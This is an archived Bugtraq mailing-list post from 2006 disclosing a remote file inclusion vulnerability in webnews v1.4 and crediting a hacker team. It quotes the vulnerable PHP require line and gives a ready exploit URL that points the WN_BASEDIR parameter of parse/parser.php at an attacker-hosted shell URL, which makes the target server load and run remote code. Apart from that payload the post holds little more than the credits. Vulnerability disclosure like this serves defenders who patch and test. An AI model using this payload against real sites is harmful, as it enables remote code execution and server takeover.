Bugtraq mailing list archives
webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
From: the-wolf-ksa () hotmail com
Date: 26 Sep 2006 02:08:21 -0000
#============================================================================================== #webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # # # #Version : v1.4 # #================================================================================================ #Bug in : parse/parser.php # #Vlu Code : #-------------------------------- # # require($WN_BASEDIR."/parse/parser.php"); # # #================================================================================================ # #Exploit : #-------------------------------- # #htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM # #================================================================================================ #Discoverd By : ThE-WoLf-KsA # #Conatact : the-wolf-ksa[at]hotmail.com #XP10_hackEr Team #GrEatZ :r00tshill & νίρεя~ђάςκεя & BooB11 & ((هتلر جدة)) & MoHaNdKo #WWW.XP10.COM ==================================================================================================
Current thread:
- webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit the-wolf-ksa (Sep 26)